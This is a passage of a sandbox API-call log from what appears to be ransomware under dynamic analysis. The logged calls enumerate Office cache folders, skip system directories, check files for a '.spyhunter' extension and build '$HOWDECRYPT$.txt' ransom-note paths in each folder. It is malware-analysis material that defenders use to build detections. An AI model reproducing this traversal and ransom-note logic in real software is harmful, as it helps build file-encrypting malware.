Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 85 [0081.459] GetProcessHeap () returned 0x2c0000 [0081.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x3213a8 [0081.459] GetProcessHeap () returned 0x2c0000 [0081.459] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x320010, Size=0x378) returned 0x320010 [0081.459] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0081.459] lstrcmpiW (lpString1="Proof.xml", lpString2="Windows") returned -1 [0081.459] lstrlenW (lpString="Windows") returned 7 [0081.459] lstrcmpiW (lpString1="Proof.xml", lpString2="$Recycle.bin") returned 1 [0081.459] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.459] lstrcmpiW (lpString1="Proof.xml", lpString2="System Volume Information") returned -1 [0081.459] lstrlenW (lpString="System Volume Information") returned 25 [0081.459] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 85 [0081.459] StrStrIW (lpFirst="Proof.xml", lpSrch=".spyhunter") returned 0x0 [0081.459] lstrcmpW (lpString1="Proof.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.459] lstrcmpW (lpString1="Proof.xml", lpString2="_uninstalling_.png") returned 1 [0081.459] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 85 [0081.459] GetProcessHeap () returned 0x2c0000 [0081.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x3214a0 [0081.459] GetProcessHeap () returned 0x2c0000 [0081.459] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x320010, Size=0x380) returned 0x320010 [0081.459] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0081.459] FindClose (in: hFindFile=0x335e20 | out: hFindFile=0x335e20) returned 1 [0081.460] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\$HOWDECRYPT$.txt") returned 92 [0081.460] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\$HOWDECRYPT$.txt") returned 92 [0081.460] GetProcessHeap () returned 0x2c0000 [0081.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfa) returned 0x324970 [0081.460] GetProcessHeap () returned 0x2c0000 [0081.460] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x320010, Size=0x388) returned 0x320010 [0081.460] GetProcessHeap () returned 0x2c0000 [0081.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x325dc0 | out: hHeap=0x2c0000) returned 1 [0081.460] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.460] lstrcmpiW (lpString1="Proof.es", lpString2="Windows") returned -1 [0081.460] lstrlenW (lpString="Windows") returned 7 [0081.460] lstrcmpiW (lpString1="Proof.es", lpString2="$Recycle.bin") returned 1 [0081.460] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.460] lstrcmpiW (lpString1="Proof.es", lpString2="System Volume Information") returned -1 [0081.460] lstrlenW (lpString="System Volume Information") returned 25 [0081.460] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es") returned 75 [0081.460] lstrcmpW (lpString1="Proof.es", lpString2=".") returned 1 [0081.460] lstrcmpW (lpString1="Proof.es", lpString2="..") returned 1 [0081.460] GetProcessHeap () returned 0x2c0000 [0081.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x325dc0 [0081.460] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*") returned 77 [0081.460] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335e20 [0081.461] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.461] lstrlenW (lpString="Windows") returned 7 [0081.461] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.461] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.461] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.461] lstrlenW (lpString="System Volume Information") returned 25 [0081.462] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\.") returned 77 [0081.462] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.462] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0081.462] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.462] lstrlenW (lpString="Windows") returned 7 [0081.462] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.462] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.462] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.462] lstrlenW (lpString="System Volume Information") returned 25 [0081.462] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\..") returned 78 [0081.462] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.462] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.462] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0081.462] lstrcmpiW (lpString1="Proof.cab", lpString2="Windows") returned -1 [0081.462] lstrlenW (lpString="Windows") returned 7 [0081.462] lstrcmpiW (lpString1="Proof.cab", lpString2="$Recycle.bin") returned 1 [0081.462] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.462] lstrcmpiW (lpString1="Proof.cab", lpString2="System Volume Information") returned -1 [0081.462] lstrlenW (lpString="System Volume Information") returned 25 [0081.462] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 85 [0081.462] StrStrIW (lpFirst="Proof.cab", lpSrch=".spyhunter") returned 0x0 [0081.462] lstrcmpW (lpString1="Proof.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.462] lstrcmpW (lpString1="Proof.cab", lpString2="_uninstalling_.png") returned 1 [0081.462] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 85 [0081.462] GetProcessHeap () returned 0x2c0000 [0081.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x324a78 [0081.462] GetProcessHeap () returned 0x2c0000 [0081.463] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x320010, Size=0x390) returned 0x320010 [0081.463] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0081.463] lstrcmpiW (lpString1="Proof.msi", lpString2="Windows") returned -1 [0081.463] lstrlenW (lpString="Windows") returned 7 [0081.463] lstrcmpiW (lpString1="Proof.msi", lpString2="$Recycle.bin") returned 1 [0081.463] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.463] lstrcmpiW (lpString1="Proof.msi", lpString2="System Volume Information") returned -1 [0081.463] lstrlenW (lpString="System Volume Information") returned 25 [0081.463] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 85 [0081.463] StrStrIW (lpFirst="Proof.msi", lpSrch=".spyhunter") returned 0x0 [0081.463] lstrcmpW (lpString1="Proof.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.463] lstrcmpW (lpString1="Proof.msi", lpString2="_uninstalling_.png") returned 1 [0081.463] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 85 [0081.463] GetProcessHeap () returned 0x2c0000 [0081.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x324b70 [0081.463] GetProcessHeap () returned 0x2c0000 [0081.463] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x320010, Size=0x398) returned 0x320010 [0081.463] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0081.463] lstrcmpiW (lpString1="Proof.xml", lpString2="Windows") returned -1 [0081.463] lstrlenW (lpString="Windows") returned 7 [0081.463] lstrcmpiW (lpString1="Proof.xml", lpString2="$Recycle.bin") returned 1 [0081.463] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.463] lstrcmpiW (lpString1="Proof.xml", lpString2="System Volume Information") returned -1 [0081.463] lstrlenW (lpString="System Volume Information") returned 25 [0081.463] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 85 [0081.463] StrStrIW (lpFirst="Proof.xml", lpSrch=".spyhunter") returned 0x0 [0081.463] lstrcmpW (lpString1="Proof.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.464] lstrcmpW (lpString1="Proof.xml", lpString2="_uninstalling_.png") returned 1 [0081.464] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 85 [0081.464] GetProcessHeap () returned 0x2c0000 [0081.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x3203b0 [0081.464] GetProcessHeap () returned 0x2c0000 [0081.464] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x320010, Size=0x3a0) returned 0x3204a8 [0081.464] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0081.464] FindClose (in: hFindFile=0x335e20 | out: hFindFile=0x335e20) returned 1 [0081.464] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\$HOWDECRYPT$.txt") returned 92 [0081.464] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\$HOWDECRYPT$.txt") returned 92 [0081.464] GetProcessHeap () returned 0x2c0000 [0081.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfa) returned 0x320010 [0081.464] GetProcessHeap () returned 0x2c0000 [0081.464] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3204a8, Size=0x3a8) returned 0x3204a8 [0081.464] GetProcessHeap () returned 0x2c0000 [0081.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x325dc0 | out: hHeap=0x2c0000) returned 1 [0081.464] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.464] lstrcmpiW (lpString1="Proof.fr", lpString2="Windows") returned -1 [0081.464] lstrlenW (lpString="Windows") returned 7 [0081.464] lstrcmpiW (lpString1="Proof.fr", lpString2="$Recycle.bin") returned 1 [0081.464] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.464] lstrcmpiW (lpString1="Proof.fr", lpString2="System Volume Information") returned -1 [0081.464] lstrlenW (lpString="System Volume Information") returned 25 [0081.464] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr") returned 75 [0081.464] lstrcmpW (lpString1="Proof.fr", lpString2=".") returned 1 [0081.465] lstrcmpW (lpString1="Proof.fr", lpString2="..") returned 1 [0081.465] GetProcessHeap () returned 0x2c0000 [0081.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x325dc0 [0081.465] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*") returned 77 [0081.465] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335e20 [0081.465] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.465] lstrlenW (lpString="Windows") returned 7 [0081.465] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.465] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.465] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.465] lstrlenW (lpString="System Volume Information") returned 25 [0081.465] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\.") returned 77 [0081.465] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.465] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0081.465] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.465] lstrlenW (lpString="Windows") returned 7 [0081.465] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.465] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.466] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.466] lstrlenW (lpString="System Volume Information") returned 25 [0081.466] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\..") returned 78 [0081.466] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.466] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.466] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0081.466] lstrcmpiW (lpString1="Proof.cab", lpString2="Windows") returned -1 [0081.466] lstrlenW (lpString="Windows") returned 7 [0081.466] lstrcmpiW (lpString1="Proof.cab", lpString2="$Recycle.bin") returned 1 [0081.466] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.466] lstrcmpiW (lpString1="Proof.cab", lpString2="System Volume Information") returned -1 [0081.466] lstrlenW (lpString="System Volume Information") returned 25 [0081.466] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 85 [0081.466] StrStrIW (lpFirst="Proof.cab", lpSrch=".spyhunter") returned 0x0 [0081.466] lstrcmpW (lpString1="Proof.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.466] lstrcmpW (lpString1="Proof.cab", lpString2="_uninstalling_.png") returned 1 [0081.466] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 85 [0081.466] GetProcessHeap () returned 0x2c0000 [0081.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x320118 [0081.467] GetProcessHeap () returned 0x2c0000 [0081.467] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3204a8, Size=0x3b0) returned 0x3204a8 [0081.467] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0081.467] lstrcmpiW (lpString1="Proof.msi", lpString2="Windows") returned -1 [0081.467] lstrlenW (lpString="Windows") returned 7 [0081.467] lstrcmpiW (lpString1="Proof.msi", lpString2="$Recycle.bin") returned 1 [0081.467] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.467] lstrcmpiW (lpString1="Proof.msi", lpString2="System Volume Information") returned -1 [0081.467] lstrlenW (lpString="System Volume Information") returned 25 [0081.467] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 85 [0081.467] StrStrIW (lpFirst="Proof.msi", lpSrch=".spyhunter") returned 0x0 [0081.467] lstrcmpW (lpString1="Proof.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.467] lstrcmpW (lpString1="Proof.msi", lpString2="_uninstalling_.png") returned 1 [0081.467] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 85 [0081.467] GetProcessHeap () returned 0x2c0000 [0081.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x320210 [0081.467] GetProcessHeap () returned 0x2c0000 [0081.467] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3204a8, Size=0x3b8) returned 0x3204a8 [0081.467] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0081.467] lstrcmpiW (lpString1="Proof.xml", lpString2="Windows") returned -1 [0081.467] lstrlenW (lpString="Windows") returned 7 [0081.467] lstrcmpiW (lpString1="Proof.xml", lpString2="$Recycle.bin") returned 1 [0081.467] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.467] lstrcmpiW (lpString1="Proof.xml", lpString2="System Volume Information") returned -1 [0081.467] lstrlenW (lpString="System Volume Information") returned 25 [0081.468] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 85 [0081.468] StrStrIW (lpFirst="Proof.xml", lpSrch=".spyhunter") returned 0x0 [0081.468] lstrcmpW (lpString1="Proof.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.468] lstrcmpW (lpString1="Proof.xml", lpString2="_uninstalling_.png") returned 1 [0081.468] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 85 [0081.468] GetProcessHeap () returned 0x2c0000 [0081.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x320868 [0081.468] GetProcessHeap () returned 0x2c0000 [0081.468] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3204a8, Size=0x3c0) returned 0x320960 [0081.468] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0081.468] FindClose (in: hFindFile=0x335e20 | out: hFindFile=0x335e20) returned 1 [0081.468] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\$HOWDECRYPT$.txt") returned 92 [0081.468] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\$HOWDECRYPT$.txt") returned 92 [0081.468] GetProcessHeap () returned 0x2c0000 [0081.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfa) returned 0x320d28 [0081.468] GetProcessHeap () returned 0x2c0000 [0081.468] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x320960, Size=0x3c8) returned 0x336e08 [0081.468] GetProcessHeap () returned 0x2c0000 [0081.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x325dc0 | out: hHeap=0x2c0000) returned 1 [0081.468] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.468] lstrcmpiW (lpString1="Proofing.msi", lpString2="Windows") returned -1 [0081.468] lstrlenW (lpString="Windows") returned 7 [0081.468] lstrcmpiW (lpString1="Proofing.msi", lpString2="$Recycle.bin") returned 1 [0081.469] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.469] lstrcmpiW (lpString1="Proofing.msi", lpString2="System Volume Information") returned -1 [0081.469] lstrlenW (lpString="System Volume Information") returned 25 [0081.469] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 79 [0081.469] StrStrIW (lpFirst="Proofing.msi", lpSrch=".spyhunter") returned 0x0 [0081.469] lstrcmpW (lpString1="Proofing.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.469] lstrcmpW (lpString1="Proofing.msi", lpString2="_uninstalling_.png") returned 1 [0081.469] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 79 [0081.469] GetProcessHeap () returned 0x2c0000 [0081.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x320e30 [0081.469] GetProcessHeap () returned 0x2c0000 [0081.469] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x336e08, Size=0x3d0) returned 0x336e08 [0081.469] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.469] lstrcmpiW (lpString1="Proofing.xml", lpString2="Windows") returned -1 [0081.469] lstrlenW (lpString="Windows") returned 7 [0081.469] lstrcmpiW (lpString1="Proofing.xml", lpString2="$Recycle.bin") returned 1 [0081.469] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.469] lstrcmpiW (lpString1="Proofing.xml", lpString2="System Volume Information") returned -1 [0081.469] lstrlenW (lpString="System Volume Information") returned 25 [0081.469] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 79 [0081.469] StrStrIW (lpFirst="Proofing.xml", lpSrch=".spyhunter") returned 0x0 [0081.469] lstrcmpW (lpString1="Proofing.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.469] lstrcmpW (lpString1="Proofing.xml", lpString2="_uninstalling_.png") returned 1 [0081.469] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 79 [0081.469] GetProcessHeap () returned 0x2c0000 [0081.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x320f18 [0081.470] GetProcessHeap () returned 0x2c0000 [0081.470] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x336e08, Size=0x3d8) returned 0x336e08 [0081.470] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.470] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0081.470] lstrlenW (lpString="Windows") returned 7 [0081.470] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0081.470] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.470] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0081.470] lstrlenW (lpString="System Volume Information") returned 25 [0081.470] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.470] StrStrIW (lpFirst="Setup.xml", lpSrch=".spyhunter") returned 0x0 [0081.470] lstrcmpW (lpString1="Setup.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.470] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0081.470] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.470] GetProcessHeap () returned 0x2c0000 [0081.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3204a8 [0081.470] GetProcessHeap () returned 0x2c0000 [0081.470] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x336e08, Size=0x3e0) returned 0x336e08 [0081.470] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0081.470] FindClose (in: hFindFile=0x30b530 | out: hFindFile=0x30b530) returned 1 [0081.470] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.470] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.470] GetProcessHeap () returned 0x2c0000 [0081.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x320590 [0081.471] GetProcessHeap () returned 0x2c0000 [0081.471] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x336e08, Size=0x3e8) returned 0x336e08 [0081.471] GetProcessHeap () returned 0x2c0000 [0081.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ffc8 | out: hHeap=0x2c0000) returned 1 [0081.471] FindNextFileW (in: hFindFile=0x30b3d8, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0081.471] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0081.471] lstrlenW (lpString="Windows") returned 7 [0081.471] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0081.471] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.471] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0081.471] lstrlenW (lpString="System Volume Information") returned 25 [0081.471] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C") returned 66 [0081.471] lstrcmpW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0081.471] lstrcmpW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0081.471] GetProcessHeap () returned 0x2c0000 [0081.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30ffc8 [0081.471] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*") returned 68 [0081.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335e20 [0081.649] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.649] lstrlenW (lpString="Windows") returned 7 [0081.649] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.649] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.649] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.649] lstrlenW (lpString="System Volume Information") returned 25 [0081.649] 